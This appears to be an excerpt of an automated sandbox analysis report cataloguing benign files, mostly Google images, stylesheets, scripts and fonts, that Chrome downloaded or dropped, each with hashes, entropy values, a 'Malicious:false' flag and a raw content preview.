                                                                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CDE6081C81D1E411A980E40920955374" xmpMM:DocumentID="xmp.did:7CFC847D62EF11EA8C6B923AE6C8D50E" xmpMM:InstanceID="xmp.iid:7CFC847C62EF11EA8C6B923AE6C8D50E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81378fcc-e360-4f5a-b73c-73862c40622c" stRef:documentID="adobe:docid:photoshop:d542e5bf-ab7d-117d-97cb-de041ad347d3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40511
                                                                                                                                                                                                                                                            Entropy (8bit):7.953850467871527
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:2fRtB5YXdQ43DmYcEMgufv9PsmrtmRaEi4tJlINYZGOiXCoY6tahze:ktgTDsEMgYRlrMRaX8JGqZGOiXR7tahC
                                                                                                                                                                                                                                                            MD5:8A711ABACE54CFA2EB384E2DBF5D5C9B
                                                                                                                                                                                                                                                            SHA1:06B500BCCF0E96501C66609E22EA96BF39E4FFF9
                                                                                                                                                                                                                                                            SHA-256:A2AE90401FCD9DBAB22A643D8674B56283818D261E8E02029889EC625E15870D
                                                                                                                                                                                                                                                            SHA-512:FFB9936358203584B492681565F36AC0453A86DBA44FCF4891556703CDC0B3DAF41796D1ED507F885932770390D2553925E9CC813EA809994E222245591F0679
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.....................................................................................................................................................................................................S............................!."1A.Qa#2q.B....$3Rbrt....5CSs....%4D......E...Tcd....................................H........................!.1AQ..aq..."2...BRr...#3b...4.....CS.$.c...............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1132 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):277546
                                                                                                                                                                                                                                                            Entropy (8bit):7.931793869156116
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:+u1aozUEskNJ7R1jRw8EEDzHGxt0zT/aqy32jRVhN:HJ35rRpPmx0Cn34hN
                                                                                                                                                                                                                                                            MD5:2953702138EF78AF5807B730EE27D212
                                                                                                                                                                                                                                                            SHA1:E6D3EADC788392182AFA4BABE082A6FA91585249
                                                                                                                                                                                                                                                            SHA-256:02FC6B66789F2706AEC5239ABDE0FDBFF47853AA1300CCEA4090CFE89C6F98A3
                                                                                                                                                                                                                                                            SHA-512:962DEF5153FCB9E22E400B33DCCAB689B49CACC9826C604BFF1C6D2A19F962538B52F8B1D33B39BE4D831161E3A1ADE7DD60A0D712E79C4A23942D0693B708BF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89al......W.R.u.{GI.n....R...0.m.....m.....C....]...R'.m..a....s..d..K..X.......t....ZY...GBal...O.........r...................l...........................r................s.....N...St..v.....i....k...........s.h...L........m.............................i........ccu...........Z..X.......=.......y....l...q.........C.............f.......o.............R.r........Z.....u....{d.......B...u........U...*..B.|..X.Wg.k..^?..}...........F...`{...........}qz.._.s>9....k....h......^.....L<..X.ig...T...............(.......y.SZ...{b.].[.....@....a:..A...`EN...............q.`.............x......2................................:............................................1..2.....:.................2..K.......!..NETSCAPE2.0.....!...*...,....l...@...C..H......*\....#J.H....3j.... C..I...(S.\...0c.I.....8....s...J...H.*]...P.J...RVK...+.....lV..Rs.]...p..K.f..W.x..wk.R...[.p....pX.8..*.?$.c...3k....$.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                            Entropy (8bit):4.4003431597789415
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:9/S90MU5IahYdmMqPLmumqrYX3DyZ/jTq98:920MUSahYdmM5qrYHw/jmi
                                                                                                                                                                                                                                                            MD5:7E4968170175907C71DC14EC4841ACAB
                                                                                                                                                                                                                                                            SHA1:C9010640A0CC81506E9721E69E0A508ECFBEAA0A
                                                                                                                                                                                                                                                            SHA-256:D7CE0FF7DA59E9040AC54917098C68952C6B4B849ABFF732908008E20E8DF18B
                                                                                                                                                                                                                                                            SHA-512:A709A66A26B7BAB6511131B89396AE88AF1BD0B8E16B72447B8FEEF3A8D4663670752D3207650456580130111B5D797B3B59E0C739F9CE6BD4D1D5F34C926E9D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/img/glue-google-color-logo.svg
                                                                                                                                                                                                                                                            Preview:<svg id="google-color-logo" width="74" height="24" viewBox="0 0 74 24" xmlns="http://www.w3.org/2000/svg"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"></path><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"></path><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 2048 x 853, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):211918
                                                                                                                                                                                                                                                            Entropy (8bit):7.889870909942964
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:edNUzkNkYQ7+8ZZgFifK3xaF4557FrSOw2yMOGWk8HqyJGvWvXnt76GNUlXKf/6A:+UwWH7gxhayD7IOtNJ8KyqynbuG/h7pt
                                                                                                                                                                                                                                                            MD5:EBEA4C0C09EFCFA9102598E91BA2998C
                                                                                                                                                                                                                                                            SHA1:B45C7B9B7B419AFCEB47783D78F58191B468E67F
                                                                                                                                                                                                                                                            SHA-256:E7931FBB991A842C47EBEEE0C3B2FD0682362EC8265D8BFB6F0825FBF603BA6A
                                                                                                                                                                                                                                                            SHA-512:14434B5BFE869BEC3D45553304EAEFAEBF801F8F404A6BBFEABA3F747136286DEB907318B8F7B2A87AD78FA4550D25BCC8EFE1987DA26DB504F2C07D9467D9D5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://storage.googleapis.com/gweb-uniblog-publish-prod/original_images/BINK_Google_Offline_Maps_v1_1.png
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......U.............sRGB....... .IDATx^...\Ev..n.I.....$!..Y.X`IK.Q..q.u.....^{...<?/9#r.KZ2... @.,......hf:w...Q.zf:.{..Uu.....ZSu...{j.~.......2.P..r.'g.8h.4m...v.. ........"....T.N.ti.D.@..nh..t*.8.../X..........d...<......D9WN..{{.D...J....?JUW....f.=...........#Pf..4J...?VhN..oM.:b.-..Q.b..r....S..M...... .>....\v..9z..@6G..e5_..;...\....e!..2.... ..J...L.. ............;?-.9... .. .....t.^..?.#.O...D.E..Q.X`.9.+_5.z..o ....@.....k*....L....*.Px..u....p....?.:..@...%..`.,.R.v""....3C............D......X7~#.. G)...i..>.@.L...$3Iz...#..?...........?...@.<.Q......~!....7..rY.?....B].....7.>...I&./....\&..~.....zQ.....Ya.. .. .. ..}..^...C..?.#Xq..pU..pt..0y.)4k..]..-...e...s.)4k....:xt.......\....@.*......).....0..Ha..@..$# ...dC.; .......?-.....'H.l.........(G.T.....d#Rn9..a...Yj...6./.v.5F.]..-..P.....K..&..AG ......./.6G@U...E.......C-....P...d......5..._.B.X. 2.m%.V<A].........?....@...E]..U?....nt.......3.#]..B..]1.jW....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65502)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):229373
                                                                                                                                                                                                                                                            Entropy (8bit):4.903845282697492
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:ca/5CPcra/5CPcya/5CPcKa/5CPcXa/5CPcRawCPcja/5CPc1awCPcfawCPcT:K
                                                                                                                                                                                                                                                            MD5:1557B3CC75E50D445001DFC48B41F047
                                                                                                                                                                                                                                                            SHA1:AA163BAF3FCA75F33470F7D869DE96FA60D477DA
                                                                                                                                                                                                                                                            SHA-256:15176EF6BEFEA37ED9F549DBDAE868DD943F25827F45491FD4D5BDA007F1D8B7
                                                                                                                                                                                                                                                            SHA-512:3CB08D063BDEBCB4C7AF87FFABBF0D3A5A2B643F3AB9E8ADEEAF7DF21195967F99732A792FBD45965C7A888221C43C2AC77FE17245627F9D5F4E50F0B042FEA2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/glue/v26_0/glue-material.min.css
                                                                                                                                                                                                                                                            Preview:/* Glue Styles for Material v9 */..glue-switch+label,.glue-radio+label,.glue-checkbox+label{color:#3c4043;cursor:pointer}.glue-switch.mdc-switch--disabled+label,.glue-radio.mdc-radio--disabled+label,.glue-checkbox.mdc-checkbox--disabled+label{color:rgba(60,64,67,.38);cursor:default}.glue-text-field+.mdc-text-field-helper-line .mdc-text-field-helper-text,.glue-text-field+.mdc-text-field-helper-line .mdc-text-field-character-counter,.glue-select+.mdc-select-helper-text{font-family:"Google Sans Text",Arial,Helvetica,sans-serif;font-size:12px;letter-spacing:.2px}[lang=ja] .glue-text-field+.mdc-text-field-helper-line .mdc-text-field-helper-text,.glue-text-field+.mdc-text-field-helper-line [lang=ja] .mdc-text-field-helper-text,[lang=ja] .glue-text-field+.mdc-text-field-helper-line .mdc-text-field-character-counter,.glue-text-field+.mdc-text-field-helper-line [lang=ja] .mdc-text-field-character-counter,[lang=ja] .glue-select+.mdc-select-helper-text{font-family:"Google Sans Text","Noto Sans JP
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                                                                            Entropy (8bit):4.142295219190901
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:lZOwFQvn:lQw6n
                                                                                                                                                                                                                                                            MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                                                                                                            SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                                                                                                            SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                                                                                                            SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                                                                                                            Preview:window.google_ad_status = 1;.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):5430
                                                                                                                                                                                                                                                            Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                            MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                            SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                            SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                            SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://support.google.com/favicon.ico
                                                                                                                                                                                                                                                            Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 660 x 264
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1237640
                                                                                                                                                                                                                                                            Entropy (8bit):7.838549926935758
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:vMNaSARd0FBc89kLjE/yAMODvvazFZKs+LiTIk1XItFLYu/bkJfvLVa869:4ed0FLNDqzTNWIIuV2Gc86
                                                                                                                                                                                                                                                            MD5:1AF26D1167E75AE644097DFA014BBCE8
                                                                                                                                                                                                                                                            SHA1:BEC3400B787EF247AD0D873D21FE615AA6231D67
                                                                                                                                                                                                                                                            SHA-256:CA19980280492826F7A9E8FB6A953F49A04CC37054A56DA4F11B22C83A079FA2
                                                                                                                                                                                                                                                            SHA-512:F96A88F467F79AC1198BB64C789B96C306E58F3B6F5E8F4A139E526A9F075C5CF9619566D0561DAEB96F464C3C5E20DA5C94C8E0AD807FBEFE640AEE5C303FAF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a................#..*G.u.....G-...&GM.F......V.K.@.... .....L.....M"iKpy..h....&g.."#...V..&.O....).TiI.g....CP..g..%P.....e...F.b.M....j.HMI..Mh.0J(...q"$Vil.(,l.m.%nt...*-Bo...N..j........Fi......U.Gr..W.....tBl.Qg........t.i.v...,....V.j...(..ho..g...V....K..........,h,...Lg.]wM$7)-W,......*--U..6Th.PLh1l...s......s.l.*.dwp....4s..\.v..9..KL.....l.OPw6.#.\....p.Wq..0`........65.gf..eM....F..;..D.}....F;.ge7..n{.........GL...d.Cu.c..m*.,..dENtR.4...NK....r8./..r.....r....v.x.......VD.66.4#.y^.tr..E.|.X.:..2J9'.5....W....Z......*XN)...tK.v....Iv.o..e..k..,ul/w-...GW+5.f.w........;....*......OOu.Vw......SGY.\..NZL4.-U.6.XW...@X.?}....th.wKz..YX.....l...2.jKYmu.k...1Y.r..k..r.O....&!.i{.ms.<D..o..M......9....\..B.ME.FA.yx..r..uZ.9/J..8.!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L..a.`.+^..-.,.4hhL...`.\..c...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6020
                                                                                                                                                                                                                                                            Entropy (8bit):5.935037352594483
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:+mjVeTeZ8DlSYKE2qKE3a/dgCCnIX0cG6H8:fVvTE2ql3a4N6c
                                                                                                                                                                                                                                                            MD5:67C66ECFC5021AE0CFBDF32BDEE91688
                                                                                                                                                                                                                                                            SHA1:2D7B977111E97DF855D96DAF2E5CA7F07EE8CC43
                                                                                                                                                                                                                                                            SHA-256:99294FAD3E114681D7504CAD26B5D425BF7BB98C82BB4ABCE603E145BA2E3E17
                                                                                                                                                                                                                                                            SHA-512:2E90F2F12F84859895A9A63A210F8E2626C22BA593918FC6E0B8452C003341CC06C0189B542F3A7AB74E1523AF3957B22DDE78CD3CF2B86DB7E37FC89B1D1E77
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/translate/v6/32px.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="32" viewBox="0 0 32 32" width="32"><path d="M0 0h32v32H0z" fill="none"/><defs><path d="M28.95 6.98L16.6 7l-2.1-6H3.05C1.92 1 1 1.92 1 3.05v19.91C1 24.08 1.92 25 3.05 25h12.32l2 6h11.59c1.12 0 2.05-.92 2.05-2.05V9.02c-.01-1.12-.93-2.04-2.06-2.04z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="34" opacity=".2" overflow="visible" transform="translate(5.909 3.909)" width="32" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACEAAAAjCAYAAAAaLGNkAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA4VJREFUeNrMWMtu21YQnZlL6mVb MWIbhbtqgxgJYCAb/0D+Jp8RZ5lfSX+hi/6Ad+kiqBYKEkRRFNuSrAdJ8c7kULJduZEsmXXZELh6 XF5yzsyZS50joh/g4MVzhrdXfL+hXtplOFsB4ljoOcnjj6cuin4V1T773cG/A9Mmcm7TarWHvvHg rdLJzx5xbB4MzwM4Otp37wfdCsfjDUdUCRwFZI6NPOcvdWqTkNISBTGPo7FIZdxs/jkh+k2vgPD1 2ufHbrc1qoZJ/aG4dB8zu6a6YWwhTucEIcZKaqS
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
                                                                                                                                                                                                                                                            Entropy (8bit):5.219671835913123
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:k6El6qF5Us6ytxasD0I+DHhi0DIy1OypkbRNkN0:k6Pq7Us9txasH+15MykVrkK
                                                                                                                                                                                                                                                            MD5:8489813BEA041F1653F5EA476BCB5095
                                                                                                                                                                                                                                                            SHA1:D1628CC53060D34EF537FD70B140D10463DF4F7B
                                                                                                                                                                                                                                                            SHA-256:0564ADB926B9C06FF10096FDEBF4CEC88B24446109E7279D5F13BE4E22982469
                                                                                                                                                                                                                                                            SHA-512:AA2F69A0090A24CD1652478A9D6D9601175005EF78E7C24DAEDF7EDF1CC6034A59A8FF6DC8371325F7B5FE1BFBF3CE54512860B7659EA1C54A0CCD03774BBA20
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=uD1GC"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("uD1GC");.var HS=function(a){_.jw.call(this,a.va)};_.C(HS,_.jw);HS.qa=_.jw.qa;HS.prototype.Hc=function(){return"uD1GC"};HS.prototype.Gd=function(){return!0};HS.prototype.Ic=function(){return _.ES};_.iw(_.isa,HS);_.Dv.uD1GC=_.Sz;._.p();.}catch(e){_._DumpException(e)}.}).call(this,this.default_TranslateWebserverUi);.// Google Inc..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 14796, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14796
                                                                                                                                                                                                                                                            Entropy (8bit):7.982540816037374
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:500PiJaGs6M7Ury7W2TYPIJ0BXMx0XKH6k8cfVHULW3Xcc4c9iSUqIcW/40k+H5g:2aeMQxxBX00L2VC+X4chU3cUjHkeW
                                                                                                                                                                                                                                                            MD5:675DF44DB2BAFC60DF7052DA41F6C94B
                                                                                                                                                                                                                                                            SHA1:8B766EB9F1DC9F4F6B6C81028570FD03A5F59509
                                                                                                                                                                                                                                                            SHA-256:8300BA70904617A47A80E9098FE00B3F7AEFD328519318C420289B0BBDFB5E2C
                                                                                                                                                                                                                                                            SHA-512:201864ED71D01588CDADC0BB0E074BD67BF37F8ECF5E570EE87EBC7510CCE70D70DD8979EB170D7560B223B625A0A2BBFA8985E637AE0389EDA25C3134CA8F93
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......9........$..9p..........................".....(.`........P........6.$.... .....%..........*}.i6.....T..F!.'....sr2..{`..:.K..".....BZ.[p.B..l..<...iX...t..bo.+X..s.K...k/6..!/...A.K.....uT.;q. *ZE.J.z.:.p.3.m.Or....~..3.|..x..3.H.Yt.Lhf...w...{...S.eP............'L.F.....,...aT..A./V~D......~.Y.....}.}.f....K.........m.s.l..`.O@#..0..#>w.H.5pW..9....u.cZ.p.................X...$t..=7...J:UQ...j.|}..=.,]..|...`0H...g...miX.g.v.7...!.....8..",...El..*.Al..N.F......H.....s.L...R..z..G..>Ij..i..s.k[.....KK..x....2./z....._2H..d.O..`.e/..:.=.Ry.l...L..a.t@...Pv......1q.^.a~<..R..1..4.p.3..h.....M.s..`X.0........@-.KH6=..E...6...<.( ...VV.^.`.'.<.......?.=L#4"%^|-"....IR.uM,..n....Z1.l..|r..n.%r..Z.........!.........&7....L..z....m~/C7L"..L...B...n"((.....z..FM..\..Q.W.p}G.[8..+X..x.a..""X"..^........z.5"......o.....l...Mi[....:....F@..}h.?!.....y[<j5..p./...#..d......M..^....S7.0i..C..[.z.>..=Q....V.N9]...4.9....g]Q.'.'..,.X.....W
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2533)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):181215
                                                                                                                                                                                                                                                            Entropy (8bit):5.4659523944303725
                                                                                                                                                                                                                                                            Encrypted:false
